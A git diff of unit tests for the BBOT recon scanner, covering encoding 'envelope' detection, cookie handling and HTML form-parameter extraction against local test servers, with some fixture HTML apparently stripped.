False + # punycode assert helpers.smart_encode_punycode("ドメイン.テスト") == "xn--eckwd4c7c.xn--zckzah" assert helpers.smart_decode_punycode("xn--eckwd4c7c.xn--zckzah") == "ドメイン.テスト" diff --git a/bbot/test/test_step_1/test_presets.py b/bbot/test/test_step_1/test_presets.py index a53eb515ff..920bc67d48 100644 --- a/bbot/test/test_step_1/test_presets.py +++ b/bbot/test/test_step_1/test_presets.py @@ -596,7 +596,7 @@ class TestModule1(BaseModule): from bbot.modules.output.base import BaseOutputModule class TestModule2(BaseOutputModule): - pass + watched_events = [] """ ) @@ -607,7 +607,7 @@ class TestModule2(BaseOutputModule): from bbot.modules.internal.base import BaseInternalModule class TestModule3(BaseInternalModule): - pass + watched_events = [] """ ) diff --git a/bbot/test/test_step_1/test_web.py b/bbot/test/test_step_1/test_web.py index 864bd50eea..96079b5f04 100644 --- a/bbot/test/test_step_1/test_web.py +++ b/bbot/test/test_step_1/test_web.py @@ -478,3 +478,23 @@ async def test_web_cookies(bbot_scanner, httpx_mock): assert not client2.cookies await scan._cleanup() + + +@pytest.mark.asyncio +async def test_http_sendcookies(bbot_scanner, bbot_httpserver): + endpoint = "/" + url = bbot_httpserver.url_for(endpoint) + from werkzeug.wrappers import Response + + def echo_cookies_handler(request): + cookies = request.cookies + cookie_str = "; ".join([f"{key}={value}" for key, value in cookies.items()]) + return Response(f"Echoed Cookies: {cookie_str}\nEchoed Headers: {request.headers}") + + bbot_httpserver.expect_request(uri=endpoint).respond_with_handler(echo_cookies_handler) + scan1 = bbot_scanner("127.0.0.1", config={"web": {"debug": True}}) + r1 = await scan1.helpers.request(url, cookies={"foo": "bar"}) + + assert r1 is not None, "Request to self-signed SSL server went through even with ssl_verify=True" + assert "bar" in r1.text + await scan1._cleanup() diff --git a/bbot/test/test_step_1/test_web_envelopes.py b/bbot/test/test_step_1/test_web_envelopes.py new file mode 100644 index 0000000000..a9dcae9433 --- /dev/null +++ b/bbot/test/test_step_1/test_web_envelopes.py @@ -0,0 +1,343 @@ +import pytest + + +async def test_web_envelopes(): + from bbot.core.helpers.web.envelopes import ( + BaseEnvelope, + TextEnvelope, + HexEnvelope, + B64Envelope, + JSONEnvelope, + XMLEnvelope, + URLEnvelope, + ) + + # simple text + text_envelope = BaseEnvelope.detect("foo") + assert isinstance(text_envelope, TextEnvelope) + assert text_envelope.unpacked_data() == "foo" + assert text_envelope.subparams == {"__default__": "foo"} + expected_subparams = [([], "foo")] + assert list(text_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert text_envelope.get_subparam(subparam) == value + assert text_envelope.pack() == "foo" + assert text_envelope.num_envelopes == 0 + assert text_envelope.get_subparam() == "foo" + text_envelope.set_subparam(value="bar") + assert text_envelope.get_subparam() == "bar" + assert text_envelope.unpacked_data() == "bar" + + # simple binary + # binary_envelope = BaseEnvelope.detect("foo\x00") + # assert isinstance(binary_envelope, BinaryEnvelope) + # assert binary_envelope.unpacked_data == "foo\x00" + # assert binary_envelope.packed_data == "foo\x00" + # assert binary_envelope.subparams == {"__default__": "foo\x00"} + + # text encoded as hex + hex_envelope = BaseEnvelope.detect("706172616d") + assert isinstance(hex_envelope, HexEnvelope) + assert hex_envelope.unpacked_data(recursive=True) == "param" + hex_inner_envelope = hex_envelope.unpacked_data(recursive=False) + assert isinstance(hex_inner_envelope, TextEnvelope) + assert hex_inner_envelope.unpacked_data(recursive=False) == "param" + assert hex_inner_envelope.unpacked_data(recursive=True) == "param" + assert list(hex_envelope.get_subparams(recursive=False)) == [([], hex_inner_envelope)] + assert list(hex_envelope.get_subparams(recursive=True)) == [([], "param")] + assert hex_inner_envelope.unpacked_data() == "param" + assert hex_inner_envelope.subparams == {"__default__": "param"} + expected_subparams = [([], "param")] + assert list(hex_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_inner_envelope.get_subparam(subparam) == value + assert hex_envelope.pack() == "706172616d" + assert hex_envelope.num_envelopes == 1 + assert hex_envelope.get_subparam() == "param" + hex_envelope.set_subparam(value="asdf") + assert hex_envelope.get_subparam() == "asdf" + assert hex_envelope.unpacked_data() == "asdf" + assert hex_envelope.pack() == "61736466" + + # text encoded as base64 + base64_envelope = BaseEnvelope.detect("cGFyYW0=") + assert isinstance(base64_envelope, B64Envelope) + assert base64_envelope.unpacked_data() == "param" + base64_inner_envelope = base64_envelope.unpacked_data(recursive=False) + assert isinstance(base64_inner_envelope, TextEnvelope) + assert list(base64_envelope.get_subparams(recursive=False)) == [([], base64_inner_envelope)] + assert list(base64_envelope.get_subparams()) == [([], "param")] + assert base64_inner_envelope.pack() == "param" + assert base64_inner_envelope.unpacked_data() == "param" + assert base64_inner_envelope.subparams == {"__default__": "param"} + expected_subparams = [([], "param")] + assert list(base64_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_inner_envelope.get_subparam(subparam) == value + assert base64_envelope.num_envelopes == 1 + base64_envelope.set_subparam(value="asdf") + assert base64_envelope.get_subparam() == "asdf" + assert base64_envelope.unpacked_data() == "asdf" + assert base64_envelope.pack() == "YXNkZg==" + + # test inside hex inside base64 + hex_envelope = BaseEnvelope.detect("634746795957303d") + assert isinstance(hex_envelope, HexEnvelope) + assert hex_envelope.get_subparam() == "param" + assert hex_envelope.unpacked_data() == "param" + base64_envelope = hex_envelope.unpacked_data(recursive=False) + assert isinstance(base64_envelope, B64Envelope) + assert base64_envelope.get_subparam() == "param" + assert base64_envelope.unpacked_data() == "param" + text_envelope = base64_envelope.unpacked_data(recursive=False) + assert isinstance(text_envelope, TextEnvelope) + assert text_envelope.get_subparam() == "param" + assert text_envelope.unpacked_data() == "param" + hex_envelope.set_subparam(value="asdf") + assert hex_envelope.get_subparam() == "asdf" + assert hex_envelope.unpacked_data() == "asdf" + assert text_envelope.get_subparam() == "asdf" + assert text_envelope.unpacked_data() == "asdf" + assert base64_envelope.get_subparam() == "asdf" + assert base64_envelope.unpacked_data() == "asdf" + + # URL-encoded text + url_encoded_envelope = BaseEnvelope.detect("a%20b%20c") + assert isinstance(url_encoded_envelope, URLEnvelope) + assert url_encoded_envelope.pack() == "a%20b%20c" + assert url_encoded_envelope.unpacked_data() == "a b c" + url_inner_envelope = url_encoded_envelope.unpacked_data(recursive=False) + assert isinstance(url_inner_envelope, TextEnvelope) + assert url_inner_envelope.unpacked_data(recursive=False) == "a b c" + assert url_inner_envelope.unpacked_data(recursive=True) == "a b c" + assert list(url_encoded_envelope.get_subparams(recursive=False)) == [([], url_inner_envelope)] + assert list(url_encoded_envelope.get_subparams(recursive=True)) == [([], "a b c")] + assert url_inner_envelope.pack() == "a b c" + assert url_inner_envelope.unpacked_data() == "a b c" + assert url_inner_envelope.subparams == {"__default__": "a b c"} + expected_subparams = [([], "a b c")] + assert list(url_inner_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert url_inner_envelope.get_subparam(subparam) == value + assert url_encoded_envelope.num_envelopes == 1 + url_encoded_envelope.set_subparam(value="a s d f") + assert url_encoded_envelope.get_subparam() == "a s d f" + assert url_encoded_envelope.unpacked_data() == "a s d f" + assert url_encoded_envelope.pack() == "a%20s%20d%20f" + + # json + json_envelope = BaseEnvelope.detect('{"param1": "val1", "param2": {"param3": "val3"}}') + assert isinstance(json_envelope, JSONEnvelope) + assert json_envelope.pack() == '{"param1": "val1", "param2": {"param3": "val3"}}' + assert json_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.unpacked_data(recursive=False) == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.unpacked_data(recursive=True) == {"param1": "val1", "param2": {"param3": "val3"}} + assert json_envelope.subparams == {"param1": "val1", "param2": {"param3": "val3"}} + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert json_envelope.get_subparam(subparam) == value + json_envelope.selected_subparam = ["param2", "param3"] + assert json_envelope.get_subparam() == "val3" + assert json_envelope.num_envelopes == 1 + + # prevent json over-detection + just_a_string = BaseEnvelope.detect("10") + assert not isinstance(just_a_string, JSONEnvelope) + + # xml + xml_envelope = BaseEnvelope.detect( + 'val1val3' + ) + assert isinstance(xml_envelope, XMLEnvelope) + assert ( + xml_envelope.pack() + == '\nval1val3' + ) + assert xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.unpacked_data(recursive=False) == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.unpacked_data(recursive=True) == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert xml_envelope.subparams == { + "root": {"param1": {"@attr": "attr1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + expected_subparams = [ + (["root", "param1", "@attr"], "attr1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert xml_envelope.get_subparam(subparam) == value + assert xml_envelope.num_envelopes == 1 + + # json inside base64 + base64_json_envelope = BaseEnvelope.detect("eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19") + assert isinstance(base64_json_envelope, B64Envelope) + assert base64_json_envelope.pack() == "eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19" + assert base64_json_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + base64_inner_envelope = base64_json_envelope.unpacked_data(recursive=False) + assert isinstance(base64_inner_envelope, JSONEnvelope) + assert base64_inner_envelope.pack() == '{"param1": "val1", "param2": {"param3": "val3"}}' + assert base64_inner_envelope.unpacked_data() == {"param1": "val1", "param2": {"param3": "val3"}} + assert base64_inner_envelope.subparams == {"param1": "val1", "param2": {"param3": "val3"}} + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + assert base64_json_envelope.num_envelopes == 2 + with pytest.raises(ValueError): + assert base64_json_envelope.get_subparam() + base64_json_envelope.selected_subparam = ["param2", "param3"] + assert base64_json_envelope.get_subparam() == "val3" + + # xml inside url inside hex inside base64 + nested_xml_envelope = BaseEnvelope.detect( + "MjUzMzYzMjUzNzMyMjUzNjY2MjUzNjY2MjUzNzM0MjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMxMjUzMjMwMjUzNjMxMjUzNzM0MjUzNzM0MjUzNzMyMjUzMzY0MjUzMjMyMjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMxMjUzMjMyMjUzMzY1MjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMxMjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMxMjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMyMjUzMzY1MjUzMzYzMjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMzMjUzMzY1MjUzNzM2MjUzNjMxMjUzNjYzMjUzMzMzMjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMzMjUzMzY1MjUzMzYzMjUzMjY2MjUzNzMwMjUzNjMxMjUzNzMyMjUzNjMxMjUzNjY0MjUzMzMyMjUzMzY1MjUzMzYzMjUzMjY2MjUzNzMyMjUzNjY2MjUzNjY2MjUzNzM0MjUzMzY1" + ) + assert isinstance(nested_xml_envelope, B64Envelope) + assert nested_xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert ( + nested_xml_envelope.pack() + == "MjUzMzQzMjUzMzQ2Nzg2ZDZjMjUzMjMwNzY2NTcyNzM2OTZmNmUyNTMzNDQyNTMyMzIzMTJlMzAyNTMyMzIyNTMyMzA2NTZlNjM2ZjY0Njk2ZTY3MjUzMzQ0MjUzMjMyNzU3NDY2MmQzODI1MzIzMjI1MzM0NjI1MzM0NTI1MzA0MTI1MzM0MzcyNmY2Zjc0MjUzMzQ1MjUzMzQzNzA2MTcyNjE2ZDMxMjUzMjMwNjE3NDc0NzIyNTMzNDQyNTMyMzI3NjYxNmMzMTI1MzIzMjI1MzM0NTc2NjE2YzMxMjUzMzQzMmY3MDYxNzI2MTZkMzEyNTMzNDUyNTMzNDM3MDYxNzI2MTZkMzIyNTMzNDUyNTMzNDM3MDYxNzI2MTZkMzMyNTMzNDU3NjYxNmMzMzI1MzM0MzJmNzA2MTcyNjE2ZDMzMjUzMzQ1MjUzMzQzMmY3MDYxNzI2MTZkMzIyNTMzNDUyNTMzNDMyZjcyNmY2Zjc0MjUzMzQ1" + ) + inner_hex_envelope = nested_xml_envelope.unpacked_data(recursive=False) + assert isinstance(inner_hex_envelope, HexEnvelope) + assert ( + inner_hex_envelope.pack() + == "253343253346786d6c25323076657273696f6e253344253232312e30253232253230656e636f64696e672533442532327574662d38253232253346253345253041253343726f6f74253345253343706172616d312532306174747225334425323276616c3125323225334576616c312533432f706172616d31253345253343706172616d32253345253343706172616d3325334576616c332533432f706172616d332533452533432f706172616d322533452533432f726f6f74253345" + ) + inner_url_envelope = inner_hex_envelope.unpacked_data(recursive=False) + assert isinstance(inner_url_envelope, URLEnvelope) + assert ( + inner_url_envelope.pack() + == r"%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22utf-8%22%3F%3E%0A%3Croot%3E%3Cparam1%20attr%3D%22val1%22%3Eval1%3C/param1%3E%3Cparam2%3E%3Cparam3%3Eval3%3C/param3%3E%3C/param2%3E%3C/root%3E" + ) + inner_xml_envelope = inner_url_envelope.unpacked_data(recursive=False) + assert isinstance(inner_xml_envelope, XMLEnvelope) + assert ( + inner_xml_envelope.pack() + == '\nval1val3' + ) + assert inner_xml_envelope.unpacked_data() == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + assert inner_xml_envelope.subparams == { + "root": {"param1": {"@attr": "val1", "#text": "val1"}, "param2": {"param3": "val3"}} + } + expected_subparams = [ + (["root", "param1", "@attr"], "val1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(nested_xml_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert nested_xml_envelope.get_subparam(subparam) == value + assert nested_xml_envelope.num_envelopes == 4 + + # manipulating text inside hex + hex_envelope = BaseEnvelope.detect("706172616d") + expected_subparams = [([], "param")] + assert list(hex_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_envelope.get_subparam(subparam) == value + hex_envelope.set_subparam([], "asdf") + expected_subparams = [([], "asdf")] + assert list(hex_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert hex_envelope.get_subparam(subparam) == value + assert hex_envelope.unpacked_data() == "asdf" + + # manipulating json inside base64 + base64_json_envelope = BaseEnvelope.detect("eyJwYXJhbTEiOiAidmFsMSIsICJwYXJhbTIiOiB7InBhcmFtMyI6ICJ2YWwzIn19") + expected_subparams = [ + (["param1"], "val1"), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + base64_json_envelope.set_subparam(["param1"], {"asdf": [None], "fdsa": 1.0}) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2", "param3"], "val3"), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert base64_json_envelope.get_subparam(subparam) == value + base64_json_envelope.set_subparam(["param2", "param3"], {"1234": [None], "4321": 1.0}) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2", "param3", "1234"], [None]), + (["param2", "param3", "4321"], 1.0), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + base64_json_envelope.set_subparam(["param2"], None) + expected_subparams = [ + (["param1", "asdf"], [None]), + (["param1", "fdsa"], 1.0), + (["param2"], None), + ] + assert list(base64_json_envelope.get_subparams()) == expected_subparams + + # xml inside url inside base64 + xml_envelope = BaseEnvelope.detect( + "JTNDP3htbCUyMHZlcnNpb249JTIyMS4wJTIyJTIwZW5jb2Rpbmc9JTIydXRmLTglMjI/JTNFJTBBJTNDcm9vdCUzRSUzQ3BhcmFtMSUyMGF0dHI9JTIydmFsMSUyMiUzRXZhbDElM0MvcGFyYW0xJTNFJTNDcGFyYW0yJTNFJTNDcGFyYW0zJTNFdmFsMyUzQy9wYXJhbTMlM0UlM0MvcGFyYW0yJTNFJTNDL3Jvb3QlM0U=" + ) + assert ( + xml_envelope.pack() + == "JTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIydXRmLTglMjIlM0YlM0UlMEElM0Nyb290JTNFJTNDcGFyYW0xJTIwYXR0ciUzRCUyMnZhbDElMjIlM0V2YWwxJTNDL3BhcmFtMSUzRSUzQ3BhcmFtMiUzRSUzQ3BhcmFtMyUzRXZhbDMlM0MvcGFyYW0zJTNFJTNDL3BhcmFtMiUzRSUzQy9yb290JTNF" + ) + expected_subparams = [ + (["root", "param1", "@attr"], "val1"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + xml_envelope.set_subparam(["root", "param1", "@attr"], "asdf") + expected_subparams = [ + (["root", "param1", "@attr"], "asdf"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3"], "val3"), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + assert ( + xml_envelope.pack() + == "JTNDJTNGeG1sJTIwdmVyc2lvbiUzRCUyMjEuMCUyMiUyMGVuY29kaW5nJTNEJTIydXRmLTglMjIlM0YlM0UlMEElM0Nyb290JTNFJTNDcGFyYW0xJTIwYXR0ciUzRCUyMmFzZGYlMjIlM0V2YWwxJTNDL3BhcmFtMSUzRSUzQ3BhcmFtMiUzRSUzQ3BhcmFtMyUzRXZhbDMlM0MvcGFyYW0zJTNFJTNDL3BhcmFtMiUzRSUzQy9yb290JTNF" + ) + xml_envelope.set_subparam(["root", "param2", "param3"], {"1234": [None], "4321": 1.0}) + expected_subparams = [ + (["root", "param1", "@attr"], "asdf"), + (["root", "param1", "#text"], "val1"), + (["root", "param2", "param3", "1234"], [None]), + (["root", "param2", "param3", "4321"], 1.0), + ] + assert list(xml_envelope.get_subparams()) == expected_subparams + + # null + null_envelope = BaseEnvelope.detect("null") + assert isinstance(null_envelope, JSONEnvelope) + assert null_envelope.unpacked_data() is None + assert null_envelope.pack() == "null" + expected_subparams = [([], None)] + assert list(null_envelope.get_subparams()) == expected_subparams + for subparam, value in expected_subparams: + assert null_envelope.get_subparam(subparam) == value + + tiny_base64 = BaseEnvelope.detect("YWJi") + assert isinstance(tiny_base64, TextEnvelope) diff --git a/bbot/test/test_step_2/module_tests/test_module_excavate.py b/bbot/test/test_step_2/module_tests/test_module_excavate.py index 1e1e8db436..5703fbefb9 100644 --- a/bbot/test/test_step_2/module_tests/test_module_excavate.py +++ b/bbot/test/test_step_2/module_tests/test_module_excavate.py @@ -139,7 +139,7 @@ async def setup_before_prep(self, module_test): def check(self, module_test, events): root_relative_detection = False page_relative_detection_1 = False - page_relative_detection_1 = False + page_relative_detection_2 = False root_page_confusion_1 = False root_page_confusion_2 = False @@ -457,26 +457,38 @@ class TestExcavateParameterExtraction(TestExcavate): $.post("/test", {jquerypost: "value2"}); -

Simple GET Form

Use the form below to submit a GET request:

-

+

+

Simple POST Form

Use the form below to submit a POST request:

-

+

+

+ +
+

Simple Generic Form

+

Use the form below to submit a request:

+
+ +

Links

href img - + """ @@ -489,12 +501,19 @@ def check(self, module_test, events): found_jquery_post = False found_form_get = False found_form_post = False + found_form_generic = False found_jquery_get_original_value = False found_jquery_post_original_value = False found_form_get_original_value = False found_form_post_original_value = False + found_form_generic_original_value = False found_htmltags_a = False found_htmltags_img = False + found_select_noquotes = False + avoid_truncated_values = True + found_form_input_with_spaces = False + found_form_get_additional_params = False + found_form_post_additional_params = False for e in events: if e.type == "WEB_PARAMETER": @@ -508,15 +527,24 @@ def check(self, module_test, events): if e.data["original_value"] == "value2": found_jquery_post_original_value = True - if e.data["description"] == "HTTP Extracted Parameter [q] (GET Form Submodule)": + if e.data["description"] == "HTTP Extracted Parameter [q1] (GET Form Submodule)": found_form_get = True if e.data["original_value"] == "flowers": found_form_get_original_value = True + if "q4" in e.data["additional_params"].keys(): + found_form_get_additional_params = True - if e.data["description"] == "HTTP Extracted Parameter [q] (POST Form Submodule)": + if e.data["description"] == "HTTP Extracted Parameter [q2] (POST Form Submodule)": found_form_post = True if e.data["original_value"] == "boats": found_form_post_original_value = True + if "q5" in e.data["additional_params"].keys(): + found_form_post_additional_params = True + + if e.data["description"] == "HTTP Extracted Parameter [q3] (Generic Form Submodule)": + found_form_generic = True + if e.data["original_value"] == "candles": + found_form_generic_original_value = True if e.data["description"] == "HTTP Extracted Parameter [age] (HTML Tags Submodule)": if e.data["original_value"] == "456": @@ -528,16 +556,164 @@ def check(self, module_test, events): if "fit" in e.data["additional_params"].keys(): found_htmltags_img = True + if ( + e.data["description"] + == "HTTP Extracted Parameter [blog-post-author-display] (POST Form Submodule)" + ): + if e.data["original_value"] == "user.name": + if "csrf" in e.data["additional_params"].keys(): + found_select_noquotes = True + + if e.data["description"] == "HTTP Extracted Parameter [q4] (GET Form Submodule)": + if e.data["original_value"] == "trees and forests": + found_form_input_with_spaces = True + if e.data["original_value"] == "trees": + avoid_truncated_values = False + assert found_jquery_get, "Did not extract Jquery GET parameters" assert found_jquery_post, "Did not extract Jquery POST parameters" assert found_form_get, "Did not extract Form GET parameters" assert found_form_post, "Did not extract Form POST parameters" + assert found_form_generic, "Did not extract Form (Generic) parameters" + assert found_form_input_with_spaces, "Did not extract Form input with spaces" + assert avoid_truncated_values, "Emitted a parameter with spaces without the entire value" assert found_jquery_get_original_value, "Did not extract Jquery GET parameter original_value" assert found_jquery_post_original_value, "Did not extract Jquery POST parameter original_value" assert found_form_get_original_value, "Did not extract Form GET parameter original_value" assert found_form_post_original_value, "Did not extract Form POST parameter original_value" + assert found_form_generic_original_value, "Did not extract Form (Generic) parameter original_value" assert found_htmltags_a, "Did not extract parameter(s) from a-tag" assert found_htmltags_img, "Did not extract parameter(s) from img-tag" + assert found_select_noquotes, "Did not extract parameter(s) from select-tag" + assert found_form_get_additional_params, "Did not extract additional parameters from GET form" + assert found_form_post_additional_params, "Did not extract additional parameters from POST form" + + +class TestExcavateParameterExtraction_postform_noaction(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + postform_extract_html = """ + +

Post for without action

+
+ + +

+ +
+ + """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.postform_extract_html, "headers": {"Content-Type": "text/html"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_formnoaction_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [state] (POST Form (no action) Submodule)" in e.data["description"]: + excavate_formnoaction_extraction = True + assert excavate_formnoaction_extraction, "Excavate failed to extract web parameter" + + +class TestExcavateParameterExtraction_postform_htmlencodedaction(TestExcavateParameterExtraction_postform_noaction): + postform_extract_html = """ + + + +
+
+ +
+ +
+ + + """ + + def check(self, module_test, events): + excavate_handle_htmlencoded_action = True + for e in events: + if e.type == "WEB_PARAMETER": + if ( + "HTTP Extracted Parameter [value] (POST Form Submodule)" in e.data["description"] + and e.data["url"] == "https://127.0.0.1:8080/sso-web/singleSignOn.action" + ): + excavate_handle_htmlencoded_action = True + assert excavate_handle_htmlencoded_action, "Excavate failed to extract web parameter" + + +class TestExcavateParameterExtraction_additionalparams(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + postformnoaction_extract_multiparams_html = """ + +

Post for without action

+
+ + + + +
+ + """ + + async def setup_after_prep(self, module_test): + respond_args = { + "response_data": self.postformnoaction_extract_multiparams_html, + "headers": {"Content-Type": "text/html"}, + } + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_additionalparam_extraction_param1 = False + excavate_additionalparam_extraction_param2 = False + excavate_additionalparam_extraction_param3 = False + for e in events: + if e.type == "WEB_PARAMETER": + if ( + e.data["name"] == "template-action" + and "csrf" in e.data["additional_params"].keys() + and "template" in e.data["additional_params"].keys() + ): + excavate_additionalparam_extraction_param1 = True + if ( + e.data["name"] == "template" + and "csrf" in e.data["additional_params"].keys() + and "template-action" in e.data["additional_params"].keys() + ): + excavate_additionalparam_extraction_param2 = True + if ( + e.data["name"] == "csrf" + and "template" in e.data["additional_params"].keys() + and "template-action" in e.data["additional_params"].keys() + ): + excavate_additionalparam_extraction_param3 = True + assert excavate_additionalparam_extraction_param1, ( + "Excavate failed to extract web parameter with correct additional data (param 1)" + ) + assert excavate_additionalparam_extraction_param2, ( + "Excavate failed to extract web parameter with correct additional data (param 2)" + ) + assert excavate_additionalparam_extraction_param3, ( + "Excavate failed to extract web parameter with correct additional data (param 3)" + ) class TestExcavateParameterExtraction_getparam(ModuleTestBase): @@ -562,10 +738,91 @@ def check(self, module_test, events): assert excavate_getparam_extraction, "Excavate failed to extract web parameter" +class TestExcavateParameterExtraction_relativeurl(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + config_overrides = {"web": {"spider_distance": 2, "spider_depth": 3}} + + # Secondary page that has a relative link to a traversal URL + secondary_page_html = """ + + Go to root + + """ + + # Primary page that leads to the secondary page + primary_page_html = """ + + Go to secondary page + + """ + + # Root page content + root_page_html = "Root page" + + async def setup_after_prep(self, module_test): + module_test.httpserver.expect_request("/").respond_with_data(self.primary_page_html) + module_test.httpserver.expect_request("/secondary").respond_with_data(self.secondary_page_html) + module_test.httpserver.expect_request("/root.html").respond_with_data(self.root_page_html) + + def check(self, module_test, events): + # Validate that the traversal was successful and WEB_PARAMETER was extracted + traversed_to_root = False + parameter_extraction_found = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter" in e.data["description"]: + parameter_extraction_found = True + + if e.type == "URL": + if "root.html" in e.parsed_url.path: + traversed_to_root = True + + assert traversed_to_root, "Failed to follow the relative traversal to /root.html" + assert parameter_extraction_found, "Excavate failed to extract parameter after traversal" + + +class TestExcavateParameterExtraction_getparam_novalue(TestExcavateParameterExtraction_getparam): + getparam_extract_html = """ + + """ + + def check(self, module_test, events): + excavate_getparam_extraction = False + found_no_value_additional_params = False + for e in events: + if e.type == "WEB_PARAMETER": + if "HTTP Extracted Parameter [searchTerm] (GET Form Submodule)" in e.data["description"]: + excavate_getparam_extraction = True + if "searchTerm2" in e.data["additional_params"].keys(): + found_no_value_additional_params = True + assert excavate_getparam_extraction, "Excavate failed to extract web parameter" + assert found_no_value_additional_params, ( + "Excavate failed to extract additional parameters for input tag with no value" + ) + + class TestExcavateParameterExtraction_json(ModuleTestBase): targets = ["http://127.0.0.1:8888/"] modules_overrides = ["httpx", "excavate", "paramminer_getparams"] - config_overrides = {"modules": {"paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}}} + config_overrides = { + "modules": { + "excavate": {"speculate_params": True}, + "paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}, + } + } getparam_extract_json = """ { "obscureParameter": 1, @@ -592,7 +849,12 @@ def check(self, module_test, events): class TestExcavateParameterExtraction_xml(ModuleTestBase): targets = ["http://127.0.0.1:8888/"] modules_overrides = ["httpx", "excavate", "paramminer_getparams"] - config_overrides = {"modules": {"paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}}} + config_overrides = { + "modules": { + "excavate": {"speculate_params": True}, + "paramminer_getparams": {"wordlist": tempwordlist([]), "recycle_words": True}, + } + } getparam_extract_xml = """ 1 @@ -616,6 +878,99 @@ def check(self, module_test, events): assert excavate_xml_extraction, "Excavate failed to extract xml parameter" +class TestExcavateParameterExtraction_xml_invalid(TestExcavateParameterExtraction_xml): + getparam_extract_xml = """ + + 1 + invalid\nwith\nnewlines + + """ + + async def setup_after_prep(self, module_test): + respond_args = {"response_data": self.getparam_extract_xml, "headers": {"Content-Type": "application/xml"}} + module_test.set_expect_requests(respond_args=respond_args) + + def check(self, module_test, events): + excavate_xml_extraction = False + for e in events: + if e.type == "WEB_PARAMETER": + if ( + "HTTP Extracted Parameter (speculative from xml content) [newlines]" in e.data["description"] + and "\n" not in e.data["original_value"] + ): + excavate_xml_extraction = True + assert excavate_xml_extraction, "Excavate failed to extract xml parameter" + + +class TestExcavateParameterExtraction_inputtagnovalue(ModuleTestBase): + targets = ["http://127.0.0.1:8888/"] + + # hunt is added as parameter extraction is only activated by one or more modules that consume WEB_PARAMETER + modules_overrides = ["httpx", "excavate", "hunt"] + getparam_extract_html = """ +
